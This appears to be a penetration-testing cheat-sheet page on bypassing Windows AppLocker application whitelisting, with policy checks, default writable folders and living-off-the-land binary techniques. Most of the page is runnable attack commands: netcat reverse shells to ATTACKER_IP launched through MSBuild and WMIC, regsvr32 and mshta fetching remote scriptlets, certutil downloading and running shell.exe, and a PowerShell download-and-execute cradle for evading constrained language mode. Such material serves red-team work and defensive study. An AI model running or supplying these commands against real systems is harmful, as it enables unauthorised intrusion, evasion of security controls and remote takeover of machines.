> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# AppLocker Bypass

> Bypassing AppLocker application whitelisting: writable paths, alternate executables, and LOLBAS techniques.

## Check AppLocker Policy

```powershell theme={"dark"}
Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections
```

```cmd theme={"dark"}
reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2"
```

### Check if Enforced

```powershell theme={"dark"}
Get-AppLockerPolicy -Effective -Xml | Select-String "EnforcementMode"
```

| Mode            | Meaning                |
| --------------- | ---------------------- |
| `NotConfigured` | Not active             |
| `AuditOnly`     | Logs but doesn't block |
| `Enabled`       | Actively blocking      |

***

## Default Writable Paths

AppLocker default rules allow execution from these paths:

```
C:\Windows\Tasks\
C:\Windows\Temp\
C:\Windows\tracing\
C:\Windows\Registration\CRMLog\
C:\Windows\System32\FxsTmp\
C:\Windows\System32\com\dmp\
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\System32\spool\drivers\color\
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter\
C:\Windows\SysWOW64\FxsTmp\
C:\Windows\SysWOW64\com\dmp\
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter\
```

### Find Writable + Executable Paths

```powershell theme={"dark"}
Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path C:\Windows\Tasks\test.exe -User Everyone
```

```cmd theme={"dark"}
icacls C:\Windows\Tasks
icacls C:\Windows\Temp
icacls C:\Windows\tracing
```

Copy payload to writable path and execute.

***

## LOLBAS (Living Off the Land)

Signed Microsoft binaries that can execute code.

```bash theme={"dark"}
https://lolbas-project.github.io/
```

### MSBuild

```cmd theme={"dark"}
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml
```

payload.xml:

```xml theme={"dark"}
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Exec">
    <Exec Command="cmd.exe /c C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"/>
  </Target>
</Project>
```

### InstallUtil

```cmd theme={"dark"}
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe
```

### Regsvr32

```cmd theme={"dark"}
regsvr32 /s /n /u /i:http://ATTACKER_IP/payload.sct scrobj.dll
```

### MSHTA

```cmd theme={"dark"}
mshta http://ATTACKER_IP/payload.hta
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""cmd /c whoami"", 0:close")
```

### Rundll32

```cmd theme={"dark"}
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").Run("cmd /c whoami")
```

### WMIC

```cmd theme={"dark"}
wmic process call create "cmd.exe /c C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
```

### CertUtil

```cmd theme={"dark"}
certutil -urlcache -split -f http://ATTACKER_IP/shell.exe C:\Windows\Tasks\shell.exe
C:\Windows\Tasks\shell.exe
```

***

## Alternate Execution Methods

### PowerShell Constrained Language Mode Bypass

Check mode:

```powershell theme={"dark"}
$ExecutionContext.SessionState.LanguageMode
```

If `ConstrainedLanguage`:

```powershell theme={"dark"}
# PowerShell v2 (if available)
powershell -version 2 -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')"
```

### DLL Execution

AppLocker may not block DLLs (not enabled by default):

```cmd theme={"dark"}
rundll32.exe shell.dll,EntryPoint
```

### Script Rules Bypass

If only `.ps1` blocked, use `.bat` or `.vbs`:

```cmd theme={"dark"}
cscript payload.vbs
wscript payload.js
```

***

## Quick Reference

| Technique      | Binary                                  |
| -------------- | --------------------------------------- |
| MSBuild        | `Microsoft.NET\...\MSBuild.exe`         |
| InstallUtil    | `Microsoft.NET\...\InstallUtil.exe`     |
| Regsvr32       | `regsvr32.exe`                          |
| MSHTA          | `mshta.exe`                             |
| Rundll32       | `rundll32.exe`                          |
| WMIC           | `wmic.exe`                              |
| CertUtil       | `certutil.exe`                          |
| Writable paths | `C:\Windows\Tasks\`, `C:\Windows\Temp\` |
